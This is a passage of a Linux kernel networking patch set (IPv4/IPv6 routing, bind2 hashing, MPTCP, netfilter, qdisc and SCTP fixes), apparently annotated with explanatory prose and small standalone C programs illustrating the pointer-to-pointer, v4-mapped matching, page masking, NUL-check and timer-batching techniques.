+-			rcu_assign_pointer(last_prim->ifa_next, promote);
++			rcu_assign_pointer(*last_prim, promote);
+ 		}
+ 
+ 		promote->ifa_flags &= ~IFA_F_SECONDARY;
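
The devinet fix turns last_prim from a pointer to the node into a pointer to the link preceding the insertion point, so promotion still splices correctly when the deleted primary was at the head of the list. The pointer-to-pointer idiom in miniature (plain C, no RCU):

#include <stdio.h>

struct node { int val; struct node *next; };

int main(void)
{
        struct node c = { 3, NULL }, b = { 2, &c }, a = { 1, &b };
        struct node *head = &a;

        /* Track the *link* after which to insert, not the node itself:
         * a struct node ** stays meaningful even if the node it once
         * pointed at is unlinked in the meantime.
         */
        struct node **last_link = &head;
        struct node n = { 0, NULL };

        n.next = *last_link;
        *last_link = &n;

        for (struct node *p = head; p; p = p->next)
                printf("%d ", p->val);
        printf("\n");
        return 0;
}
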
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 3bb890a40ed73..3b6e6bc80dc1c 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -278,7 +278,8 @@ void fib_release_info(struct fib_info *fi)
+ 				hlist_del(&nexthop_nh->nh_hash);
+ 			} endfor_nexthops(fi)
+ 		}
+-		fi->fib_dead = 1;
++		/* Paired with READ_ONCE() from fib_table_lookup() */
++		WRITE_ONCE(fi->fib_dead, 1);
+ 		fib_info_put(fi);
+ 	}
+ 	spin_unlock_bh(&fib_info_lock);
+@@ -1581,6 +1582,7 @@ struct fib_info *fib_create_info(struct fib_config *cfg,
+ link_it:
+ 	ofi = fib_find_info(fi);
+ 	if (ofi) {
++		/* fib_table_lookup() should not see @fi yet. */
+ 		fi->fib_dead = 1;
+ 		free_fib_info(fi);
+ 		refcount_inc(&ofi->fib_treeref);
+@@ -1619,6 +1621,7 @@ err_inval:
+ 
+ failure:
+ 	if (fi) {
++		/* fib_table_lookup() should not see @fi yet. */
+ 		fi->fib_dead = 1;
+ 		free_fib_info(fi);
+ 	}
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index 74d403dbd2b4e..d13fb9e76b971 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -1582,7 +1582,8 @@ found:
+ 		if (fa->fa_dscp &&
+ 		    inet_dscp_to_dsfield(fa->fa_dscp) != flp->flowi4_tos)
+ 			continue;
+-		if (fi->fib_dead)
++		/* Paired with WRITE_ONCE() in fib_release_info() */
++		if (READ_ONCE(fi->fib_dead))
+ 			continue;
+ 		if (fa->fa_info->fib_scope < flp->flowi4_scope)
+ 			continue;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index c19b462662ad0..d79de4b95186b 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -795,43 +795,45 @@ static bool inet_bind2_bucket_match(const struct inet_bind2_bucket *tb,
+ 				    const struct net *net, unsigned short port,
+ 				    int l3mdev, const struct sock *sk)
+ {
++	if (!net_eq(ib2_net(tb), net) || tb->port != port ||
++	    tb->l3mdev != l3mdev)
++		return false;
++
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return ipv6_addr_v4mapped(&tb->v6_rcv_saddr) &&
++				tb->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev &&
+-			ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+-	else
++		return ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+ #endif
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev && tb->rcv_saddr == sk->sk_rcv_saddr;
++	return tb->rcv_saddr == sk->sk_rcv_saddr;
+ }
+ 
+ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const struct net *net,
+ 				      unsigned short port, int l3mdev, const struct sock *sk)
+ {
+-#if IS_ENABLED(CONFIG_IPV6)
+-	struct in6_addr addr_any = {};
++	if (!net_eq(ib2_net(tb), net) || tb->port != port ||
++	    tb->l3mdev != l3mdev)
++		return false;
+ 
++#if IS_ENABLED(CONFIG_IPV6)
+ 	if (sk->sk_family != tb->family) {
+ 		if (sk->sk_family == AF_INET)
+-			return net_eq(ib2_net(tb), net) && tb->port == port &&
+-				tb->l3mdev == l3mdev &&
+-				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++			return ipv6_addr_any(&tb->v6_rcv_saddr) ||
++				ipv6_addr_v4mapped_any(&tb->v6_rcv_saddr);
+ 
+ 		return false;
+ 	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev &&
+-			ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
+-	else
++		return ipv6_addr_any(&tb->v6_rcv_saddr);
+ #endif
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev && tb->rcv_saddr == 0;
++	return tb->rcv_saddr == 0;
+ }
+ 
+ /* The socket's bhash2 hashbucket spinlock must be held when this is called */
+@@ -853,11 +855,10 @@ inet_bhash2_addr_any_hashbucket(const struct sock *sk, const struct net *net, in
+ {
+ 	struct inet_hashinfo *hinfo = tcp_or_dccp_get_hashinfo(sk);
+ 	u32 hash;
+-#if IS_ENABLED(CONFIG_IPV6)
+-	struct in6_addr addr_any = {};
+ 
++#if IS_ENABLED(CONFIG_IPV6)
+ 	if (sk->sk_family == AF_INET6)
+-		hash = ipv6_portaddr_hash(net, &addr_any, port);
++		hash = ipv6_portaddr_hash(net, &in6addr_any, port);
+ 	else
+ #endif
+ 		hash = ipv4_portaddr_hash(net, 0, port);
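
The bind2 bucket rework also teaches the matchers about v4-mapped addresses: an AF_INET socket can now match an AF_INET6 bucket whose saddr is ::ffff:a.b.c.d with the right embedded IPv4 address. A standalone approximation of that comparison (the struct layout is simplified):

#include <arpa/inet.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct v6 { uint32_t w[4]; };

/* True for ::ffff:a.b.c.d, the v4-mapped form of an IPv4 address. */
static bool v4mapped(const struct v6 *a)
{
        return a->w[0] == 0 && a->w[1] == 0 && a->w[2] == htonl(0x0000ffff);
}

/* Cross-family match: an AF_INET socket matches an AF_INET6 bucket
 * only when the bucket address is v4-mapped and the embedded IPv4
 * address (the last word) is equal.
 */
static bool match_v4_sock(const struct v6 *bucket, uint32_t v4addr)
{
        return v4mapped(bucket) && bucket->w[3] == v4addr;
}

int main(void)
{
        struct v6 b = { { 0, 0, htonl(0x0000ffff), htonl(0x7f000001) } };

        printf("%d\n", match_v4_sock(&b, htonl(0x7f000001)));
        return 0;
}
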
+diff --git a/net/ipv4/ip_input.c b/net/ipv4/ip_input.c
+index e880ce77322aa..e7196ecffafc6 100644
+--- a/net/ipv4/ip_input.c
++++ b/net/ipv4/ip_input.c
+@@ -584,7 +584,8 @@ static void ip_sublist_rcv_finish(struct list_head *head)
+ static struct sk_buff *ip_extract_route_hint(const struct net *net,
+ 					     struct sk_buff *skb, int rt_type)
+ {
+-	if (fib4_has_custom_rules(net) || rt_type == RTN_BROADCAST)
++	if (fib4_has_custom_rules(net) || rt_type == RTN_BROADCAST ||
++	    IPCB(skb)->flags & IPSKB_MULTIPATH)
+ 		return NULL;
+ 
+ 	return skb;
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 51bd9a50a1d1d..a04ffc128e22b 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -2146,6 +2146,7 @@ static int ip_mkroute_input(struct sk_buff *skb,
+ 		int h = fib_multipath_hash(res->fi->fib_net, NULL, skb, hkeys);
+ 
+ 		fib_select_multipath(res, h);
++		IPCB(skb)->flags |= IPSKB_MULTIPATH;
+ 	}
+ #endif
+ 
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 26bd039f9296f..dc3166e56169f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3380,7 +3380,7 @@ void sk_forced_mem_schedule(struct sock *sk, int size)
+ 	if (delta <= 0)
+ 		return;
+ 	amt = sk_mem_pages(delta);
+-	sk->sk_forward_alloc += amt << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, amt << PAGE_SHIFT);
+ 	sk_memory_allocated_add(sk, amt);
+ 
+ 	if (mem_cgroup_sockets_enabled && sk->sk_memcg)
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 42c1f7d9a980a..b2aa7777521f6 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -1474,9 +1474,9 @@ static void udp_rmem_release(struct sock *sk, int size, int partial,
+ 		spin_lock(&sk_queue->lock);
+ 
+ 
+-	sk->sk_forward_alloc += size;
++	sk_forward_alloc_add(sk, size);
+ 	amt = (sk->sk_forward_alloc - partial) & ~(PAGE_SIZE - 1);
+-	sk->sk_forward_alloc -= amt;
++	sk_forward_alloc_add(sk, -amt);
+ 
+ 	if (amt)
+ 		__sk_mem_reduce_allocated(sk, amt >> PAGE_SHIFT);
+@@ -1582,7 +1582,7 @@ int __udp_enqueue_schedule_skb(struct sock *sk, struct sk_buff *skb)
+ 		sk->sk_forward_alloc += delta;
+ 	}
+ 
+-	sk->sk_forward_alloc -= size;
++	sk_forward_alloc_add(sk, -size);
+ 
+ 	/* no need to setup a destructor, we will explicitly release the
+ 	 * forward allocated memory on dequeue
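
The udp.c hunks only convert the sk_forward_alloc updates to sk_forward_alloc_add(); the surrounding reclaim logic is unchanged and keeps any sub-page remainder cached. The page-masking arithmetic it relies on, as a quick standalone check:

#include <stdio.h>

#define PAGE_SIZE 4096UL

int main(void)
{
        unsigned long fwd_alloc = 10000, partial = 1;

        /* Give back only whole pages, keeping 'partial' bytes plus the
         * sub-page remainder cached for the next receive.
         */
        unsigned long amt = (fwd_alloc - partial) & ~(PAGE_SIZE - 1);

        printf("reclaim %lu bytes (%lu pages), keep %lu\n",
               amt, amt / PAGE_SIZE, fwd_alloc - amt);
        return 0;
}
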
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 48a6486951cd6..83be842198244 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -1368,7 +1368,7 @@ retry:
+ 	 * idev->desync_factor if it's larger
+ 	 */
+ 	cnf_temp_preferred_lft = READ_ONCE(idev->cnf.temp_prefered_lft);
+-	max_desync_factor = min_t(__u32,
++	max_desync_factor = min_t(long,
+ 				  idev->cnf.max_desync_factor,
+ 				  cnf_temp_preferred_lft - regen_advance);
+ 
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index d94041bb42872..b8378814532ce 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -99,7 +99,8 @@ static bool ip6_can_use_hint(const struct sk_buff *skb,
+ static struct sk_buff *ip6_extract_route_hint(const struct net *net,
+ 					      struct sk_buff *skb)
+ {
+-	if (fib6_routes_require_src(net) || fib6_has_custom_rules(net))
++	if (fib6_routes_require_src(net) || fib6_has_custom_rules(net) ||
++	    IP6CB(skb)->flags & IP6SKB_MULTIPATH)
+ 		return NULL;
+ 
+ 	return skb;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 960ab43a49c46..93957b20fccce 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -425,6 +425,9 @@ void fib6_select_path(const struct net *net, struct fib6_result *res,
+ 	if (match->nh && have_oif_match && res->nh)
+ 		return;
+ 
++	if (skb)
++		IP6CB(skb)->flags |= IP6SKB_MULTIPATH;
++
+ 	/* We might have already computed the hash for ICMPv6 errors. In such
+ 	 * case it will always be non-zero. Otherwise now is the time to do it.
+ 	 */
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 890a2423f559e..65845c59c0655 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -1065,15 +1065,18 @@ partial_message:
+ out_error:
+ 	kcm_push(kcm);
+ 
+-	if (copied && sock->type == SOCK_SEQPACKET) {
++	if (sock->type == SOCK_SEQPACKET) {
+ 		/* Wrote some bytes before encountering an
+ 		 * error, return partial success.
+ 		 */
+-		goto partial_message;
+-	}
+-
+-	if (head != kcm->seq_skb)
++		if (copied)
++			goto partial_message;
++		if (head != kcm->seq_skb)
++			kfree_skb(head);
++	} else {
+ 		kfree_skb(head);
++		kcm->seq_skb = NULL;
++	}
+ 
+ 	err = sk_stream_error(sk, msg->msg_flags, err);
+ 
+@@ -1981,6 +1984,8 @@ static __net_exit void kcm_exit_net(struct net *net)
+ 	 * that all multiplexors and psocks have been destroyed.
+ 	 */
+ 	WARN_ON(!list_empty(&knet->mux_list));
++
++	mutex_destroy(&knet->mutex);
+ }
+ 
+ static struct pernet_operations kcm_net_ops = {
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 61fefa1a82db2..6dd880d6b0518 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -131,9 +131,15 @@ static void mptcp_drop(struct sock *sk, struct sk_buff *skb)
+ 	__kfree_skb(skb);
+ }
+ 
++static void mptcp_rmem_fwd_alloc_add(struct sock *sk, int size)
++{
++	WRITE_ONCE(mptcp_sk(sk)->rmem_fwd_alloc,
++		   mptcp_sk(sk)->rmem_fwd_alloc + size);
++}
++
+ static void mptcp_rmem_charge(struct sock *sk, int size)
+ {
+-	mptcp_sk(sk)->rmem_fwd_alloc -= size;
++	mptcp_rmem_fwd_alloc_add(sk, -size);
+ }
+ 
+ static bool mptcp_try_coalesce(struct sock *sk, struct sk_buff *to,
+@@ -174,7 +180,7 @@ static bool mptcp_ooo_try_coalesce(struct mptcp_sock *msk, struct sk_buff *to,
+ static void __mptcp_rmem_reclaim(struct sock *sk, int amount)
+ {
+ 	amount >>= PAGE_SHIFT;
+-	mptcp_sk(sk)->rmem_fwd_alloc -= amount << PAGE_SHIFT;
++	mptcp_rmem_charge(sk, amount << PAGE_SHIFT);
+ 	__sk_mem_reduce_allocated(sk, amount);
+ }
+ 
+@@ -183,7 +189,7 @@ static void mptcp_rmem_uncharge(struct sock *sk, int size)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	int reclaimable;
+ 
+-	msk->rmem_fwd_alloc += size;
++	mptcp_rmem_fwd_alloc_add(sk, size);
+ 	reclaimable = msk->rmem_fwd_alloc - sk_unused_reserved_mem(sk);
+ 
+ 	/* see sk_mem_uncharge() for the rationale behind the following schema */
+@@ -338,7 +344,7 @@ static bool mptcp_rmem_schedule(struct sock *sk, struct sock *ssk, int size)
+ 	if (!__sk_mem_raise_allocated(sk, size, amt, SK_MEM_RECV))
+ 		return false;
+ 
+-	msk->rmem_fwd_alloc += amount;
++	mptcp_rmem_fwd_alloc_add(sk, amount);
+ 	return true;
+ }
+ 
+@@ -1802,7 +1808,7 @@ static int mptcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		}
+ 
+ 		/* data successfully copied into the write queue */
+-		sk->sk_forward_alloc -= total_ts;
++		sk_forward_alloc_add(sk, -total_ts);
+ 		copied += psize;
+ 		dfrag->data_len += psize;
+ 		frag_truesize += psize;
+@@ -3278,8 +3284,8 @@ void mptcp_destroy_common(struct mptcp_sock *msk, unsigned int flags)
+ 	/* move all the rx fwd alloc into the sk_mem_reclaim_final in
+ 	 * inet_sock_destruct() will dispose it
+ 	 */
+-	sk->sk_forward_alloc += msk->rmem_fwd_alloc;
+-	msk->rmem_fwd_alloc = 0;
++	sk_forward_alloc_add(sk, msk->rmem_fwd_alloc);
++	WRITE_ONCE(msk->rmem_fwd_alloc, 0);
+ 	mptcp_token_destroy(msk);
+ 	mptcp_pm_free_anno_list(msk);
+ 	mptcp_free_local_addr_list(msk);
+@@ -3562,7 +3568,8 @@ static void mptcp_shutdown(struct sock *sk, int how)
+ 
+ static int mptcp_forward_alloc_get(const struct sock *sk)
+ {
+-	return sk->sk_forward_alloc + mptcp_sk(sk)->rmem_fwd_alloc;
++	return READ_ONCE(sk->sk_forward_alloc) +
++	       READ_ONCE(mptcp_sk(sk)->rmem_fwd_alloc);
+ }
+ 
+ static int mptcp_ioctl_outq(const struct mptcp_sock *msk, u64 v)
+diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
+index 8f1bfa6ccc2d9..50723ba082890 100644
+--- a/net/netfilter/nfnetlink_osf.c
++++ b/net/netfilter/nfnetlink_osf.c
+@@ -315,6 +315,14 @@ static int nfnl_osf_add_callback(struct sk_buff *skb,
+ 
+ 	f = nla_data(osf_attrs[OSF_ATTR_FINGER]);
+ 
++	if (f->opt_num > ARRAY_SIZE(f->opt))
++		return -EINVAL;
++
++	if (!memchr(f->genre, 0, MAXGENRELEN) ||
++	    !memchr(f->subtype, 0, MAXGENRELEN) ||
++	    !memchr(f->version, 0, MAXGENRELEN))
++		return -EINVAL;
++
+ 	kf = kmalloc(sizeof(struct nf_osf_finger), GFP_KERNEL);
+ 	if (!kf)
+ 		return -ENOMEM;
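
The nfnetlink_osf hardening rejects fingerprints whose opt_num exceeds the option array and whose fixed-size string fields lack a terminating NUL; memchr() bounds the scan where strlen() on untrusted input would not. A minimal sketch of the NUL check (the MAXGENRELEN value is borrowed from the hunk):

#include <stdio.h>
#include <string.h>

#define MAXGENRELEN 32

/* Reject a fixed-size field that arrived without a terminating NUL:
 * memchr() never reads past the buffer, unlike strlen().
 */
static int validate_field(const char buf[MAXGENRELEN])
{
        return memchr(buf, '\0', MAXGENRELEN) ? 0 : -1;
}

int main(void)
{
        char good[MAXGENRELEN] = "Linux";
        char bad[MAXGENRELEN];

        memset(bad, 'A', sizeof(bad));   /* no NUL anywhere */
        printf("%d %d\n", validate_field(good), validate_field(bad));
        return 0;
}
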
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index c307c57a93e57..efb50c2b41f32 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -35,6 +35,14 @@ static unsigned int optlen(const u8 *opt, unsigned int offset)
+ 		return opt[offset + 1];
+ }
+ 
++static int nft_skb_copy_to_reg(const struct sk_buff *skb, int offset, u32 *dest, unsigned int len)
++{
++	if (len % NFT_REG32_SIZE)
++		dest[len / NFT_REG32_SIZE] = 0;
++
++	return skb_copy_bits(skb, offset, dest, len);
++}
++
+ static void nft_exthdr_ipv6_eval(const struct nft_expr *expr,
+ 				 struct nft_regs *regs,
+ 				 const struct nft_pktinfo *pkt)
+@@ -56,8 +64,7 @@ static void nft_exthdr_ipv6_eval(const struct nft_expr *expr,
+ 	}
+ 	offset += priv->offset;
+ 
+-	dest[priv->len / NFT_REG32_SIZE] = 0;
+-	if (skb_copy_bits(pkt->skb, offset, dest, priv->len) < 0)
++	if (nft_skb_copy_to_reg(pkt->skb, offset, dest, priv->len) < 0)
+ 		goto err;
+ 	return;
+ err:
+@@ -153,8 +160,7 @@ static void nft_exthdr_ipv4_eval(const struct nft_expr *expr,
+ 	}
+ 	offset += priv->offset;
+ 
+-	dest[priv->len / NFT_REG32_SIZE] = 0;
+-	if (skb_copy_bits(pkt->skb, offset, dest, priv->len) < 0)
++	if (nft_skb_copy_to_reg(pkt->skb, offset, dest, priv->len) < 0)
+ 		goto err;
+ 	return;
+ err:
+@@ -210,7 +216,8 @@ static void nft_exthdr_tcp_eval(const struct nft_expr *expr,
+ 		if (priv->flags & NFT_EXTHDR_F_PRESENT) {
+ 			*dest = 1;
+ 		} else {
+-			dest[priv->len / NFT_REG32_SIZE] = 0;
++			if (priv->len % NFT_REG32_SIZE)
++				dest[priv->len / NFT_REG32_SIZE] = 0;
+ 			memcpy(dest, opt + offset, priv->len);
+ 		}
+ 
+@@ -388,9 +395,8 @@ static void nft_exthdr_sctp_eval(const struct nft_expr *expr,
+ 			    offset + ntohs(sch->length) > pkt->skb->len)
+ 				break;
+ 
+-			dest[priv->len / NFT_REG32_SIZE] = 0;
+-			if (skb_copy_bits(pkt->skb, offset + priv->offset,
+-					  dest, priv->len) < 0)
++			if (nft_skb_copy_to_reg(pkt->skb, offset + priv->offset,
++						dest, priv->len) < 0)
+ 				break;
+ 			return;
+ 		}
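
nft_skb_copy_to_reg() centralizes a subtle fix: the old code zeroed dest[len / NFT_REG32_SIZE] unconditionally, which for register-aligned lengths writes one 32-bit word past the copied area. The helper clears that slot only when a partial register will be left over. A standalone version of the same guard (illustrative names):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REG32_SIZE 4

/* Copy len bytes into a u32 register file. Only when len is not a
 * multiple of 4 does the final, partially-written register need
 * clearing first; for aligned lengths the old unconditional store
 * would land one word past the copy.
 */
static void copy_to_reg(uint32_t *dest, const void *src, unsigned int len)
{
        if (len % REG32_SIZE)
                dest[len / REG32_SIZE] = 0;
        memcpy(dest, src, len);
}

int main(void)
{
        uint32_t regs[2] = { 0xdeadbeef, 0xdeadbeef };
        uint8_t payload[6] = { 1, 2, 3, 4, 5, 6 };

        copy_to_reg(regs, payload, sizeof(payload));
        printf("%08x %08x\n", regs[0], regs[1]);
        return 0;
}
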
+diff --git a/net/sched/sch_fq_pie.c b/net/sched/sch_fq_pie.c
+index 591d87d5e5c0f..68e6acd0f130d 100644
+--- a/net/sched/sch_fq_pie.c
++++ b/net/sched/sch_fq_pie.c
+@@ -61,6 +61,7 @@ struct fq_pie_sched_data {
+ 	struct pie_params p_params;
+ 	u32 ecn_prob;
+ 	u32 flows_cnt;
++	u32 flows_cursor;
+ 	u32 quantum;
+ 	u32 memory_limit;
+ 	u32 new_flow_count;
+@@ -375,22 +376,32 @@ flow_error:
+ static void fq_pie_timer(struct timer_list *t)
+ {
+ 	struct fq_pie_sched_data *q = from_timer(q, t, adapt_timer);
++	unsigned long next, tupdate;
+ 	struct Qdisc *sch = q->sch;
+ 	spinlock_t *root_lock; /* to lock qdisc for probability calculations */
+-	u32 idx;
++	int max_cnt, i;
+ 
+ 	rcu_read_lock();
+ 	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 
+-	for (idx = 0; idx < q->flows_cnt; idx++)
+-		pie_calculate_probability(&q->p_params, &q->flows[idx].vars,
+-					  q->flows[idx].backlog);
+-
+-	/* reset the timer to fire after 'tupdate' jiffies. */
+-	if (q->p_params.tupdate)
+-		mod_timer(&q->adapt_timer, jiffies + q->p_params.tupdate);
++	/* Limit this expensive loop to 2048 flows per round. */
++	max_cnt = min_t(int, q->flows_cnt - q->flows_cursor, 2048);
++	for (i = 0; i < max_cnt; i++) {
++		pie_calculate_probability(&q->p_params,
++					  &q->flows[q->flows_cursor].vars,
++					  q->flows[q->flows_cursor].backlog);
++		q->flows_cursor++;
++	}
+ 
++	tupdate = q->p_params.tupdate;
++	next = 0;
++	if (q->flows_cursor >= q->flows_cnt) {
++		q->flows_cursor = 0;
++		next = tupdate;
++	}
++	if (tupdate)
++		mod_timer(&q->adapt_timer, jiffies + next);
+ 	spin_unlock(root_lock);
+ 	rcu_read_unlock();
+ }
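
The fq_pie timer used to recompute the drop probability for every flow in one callback, which with a large flows_cnt monopolizes the qdisc lock. The hunk bounds each tick to 2048 flows and keeps a cursor, re-arming the timer with no delay until the pass completes. A compact model of that scheme (the constants are illustrative):

#include <stdio.h>

#define NFLOWS 5000
#define BATCH  2048

static unsigned int cursor;

/* One timer tick: process at most BATCH flows, remembering where we
 * stopped. Returns the delay before the next tick: zero until a full
 * pass is done, then one update interval.
 */
static unsigned long timer_tick(unsigned long tupdate)
{
        unsigned int n = NFLOWS - cursor;

        if (n > BATCH)
                n = BATCH;
        for (unsigned int i = 0; i < n; i++)
                cursor++;       /* stands in for per-flow probability work */

        if (cursor >= NFLOWS) {
                cursor = 0;
                return tupdate; /* full pass done: normal interval */
        }
        return 0;               /* more flows pending: re-arm at once */
}

int main(void)
{
        for (int tick = 0; tick < 4; tick++)
                printf("tick %d -> next delay %lu\n", tick, timer_tick(100));
        return 0;
}
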
+diff --git a/net/sched/sch_plug.c b/net/sched/sch_plug.c
+index ea8c4a7174bba..35f49edf63dbf 100644
+--- a/net/sched/sch_plug.c
++++ b/net/sched/sch_plug.c
+@@ -207,7 +207,7 @@ static struct Qdisc_ops plug_qdisc_ops __read_mostly = {
+ 	.priv_size   =       sizeof(struct plug_sched_data),
+ 	.enqueue     =       plug_enqueue,
+ 	.dequeue     =       plug_dequeue,
+-	.peek        =       qdisc_peek_head,
++	.peek        =       qdisc_peek_dequeued,
+ 	.init        =       plug_init,
+ 	.change      =       plug_change,
+ 	.reset       =	     qdisc_reset_queue,
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index e150d08f182d8..ed01634af82c2 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -973,10 +973,13 @@ static void qfq_update_eligible(struct qfq_sched *q)
+ }
+ 
+ /* Dequeue head packet of the head class in the DRR queue of the aggregate. */
+-static void agg_dequeue(struct qfq_aggregate *agg,
+-			struct qfq_class *cl, unsigned int len)
++static struct sk_buff *agg_dequeue(struct qfq_aggregate *agg,
++				   struct qfq_class *cl, unsigned int len)
+ {
+-	qdisc_dequeue_peeked(cl->qdisc);
++	struct sk_buff *skb = qdisc_dequeue_peeked(cl->qdisc);
++
++	if (!skb)
++		return NULL;
+ 
+ 	cl->deficit -= (int) len;
+ 
+@@ -986,6 +989,8 @@ static void agg_dequeue(struct qfq_aggregate *agg,
+ 		cl->deficit += agg->lmax;
+ 		list_move_tail(&cl->alist, &agg->active);
+ 	}
++
++	return skb;
+ }
+ 
+ static inline struct sk_buff *qfq_peek_skb(struct qfq_aggregate *agg,
+@@ -1131,11 +1136,18 @@ static struct sk_buff *qfq_dequeue(struct Qdisc *sch)
+ 	if (!skb)
+ 		return NULL;
+ 
+-	qdisc_qstats_backlog_dec(sch, skb);
+ 	sch->q.qlen--;
++
++	skb = agg_dequeue(in_serv_agg, cl, len);
++
++	if (!skb) {
++		sch->q.qlen++;
++		return NULL;
++	}
++
++	qdisc_qstats_backlog_dec(sch, skb);
+ 	qdisc_bstats_update(sch, skb);
+ 
+-	agg_dequeue(in_serv_agg, cl, len);
+ 	/* If lmax is lowered, through qfq_change_class, for a class
+ 	 * owning pending packets with larger size than the new value
+ 	 * of lmax, then the following condition may hold.
+diff --git a/net/sctp/proc.c b/net/sctp/proc.c
+index f13d6a34f32f2..ec00ee75d59a6 100644
+--- a/net/sctp/proc.c
++++ b/net/sctp/proc.c
+@@ -282,7 +282,7 @@ static int sctp_assocs_seq_show(struct seq_file *seq, void *v)
+ 		assoc->init_retries, assoc->shutdown_retries,
+ 		assoc->rtx_data_chunks,
+ 		refcount_read(&sk->sk_wmem_alloc),
+-		sk->sk_wmem_queued,
++		READ_ONCE(sk->sk_wmem_queued),
+ 		sk->sk_sndbuf,
+ 		sk->sk_rcvbuf);
+ 	seq_printf(seq, "\n");
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index a11b0d903514c..32e3669adf146 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -68,7 +68,7 @@
+ #include <net/sctp/stream_sched.h>
+ 
+ /* Forward declarations for internal helper functions. */
+-static bool sctp_writeable(struct sock *sk);
++static bool sctp_writeable(const struct sock *sk);
+ static void sctp_wfree(struct sk_buff *skb);
+ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p,
+ 				size_t msg_len);
+@@ -139,7 +139,7 @@ static inline void sctp_set_owner_w(struct sctp_chunk *chunk)
+ 
+ 	refcount_add(sizeof(struct sctp_chunk), &sk->sk_wmem_alloc);
+ 	asoc->sndbuf_used += chunk->skb->truesize + sizeof(struct sctp_chunk);
+-	sk->sk_wmem_queued += chunk->skb->truesize + sizeof(struct sctp_chunk);
++	sk_wmem_queued_add(sk, chunk->skb->truesize + sizeof(struct sctp_chunk));
+ 	sk_mem_charge(sk, chunk->skb->truesize);
+ }
+ 
+@@ -9139,7 +9139,7 @@ static void sctp_wfree(struct sk_buff *skb)
+ 	struct sock *sk = asoc->base.sk;
+ 
+ 	sk_mem_uncharge(sk, skb->truesize);
+-	sk->sk_wmem_queued -= skb->truesize + sizeof(struct sctp_chunk);
++	sk_wmem_queued_add(sk, -(skb->truesize + sizeof(struct sctp_chunk)));
+ 	asoc->sndbuf_used -= skb->truesize + sizeof(struct sctp_chunk);
+ 	WARN_ON(refcount_sub_and_test(sizeof(struct sctp_chunk),
+ 				      &sk->sk_wmem_alloc));
+@@ -9292,9 +9292,9 @@ void sctp_write_space(struct sock *sk)
+  * UDP-style sockets or TCP-style sockets, this code should work.
+  *  - Daisy
+  */
+-static bool sctp_writeable(struct sock *sk)
++static bool sctp_writeable(const struct sock *sk)
+ {
+-	return sk->sk_sndbuf > sk->sk_wmem_queued;
++	return READ_ONCE(sk->sk_sndbuf) > READ_ONCE(sk->sk_wmem_queued);
+ }
+ 
+ /* Wait for an association to go into ESTABLISHED state. If timeout is 0,
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c676d92af7b7d..64b6dd439938e 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1650,6 +1650,7 @@ void smcr_port_add(struct smc_ib_device *smcibdev, u8 ibport)
+ {
+ 	struct smc_link_group *lgr, *n;
+ 
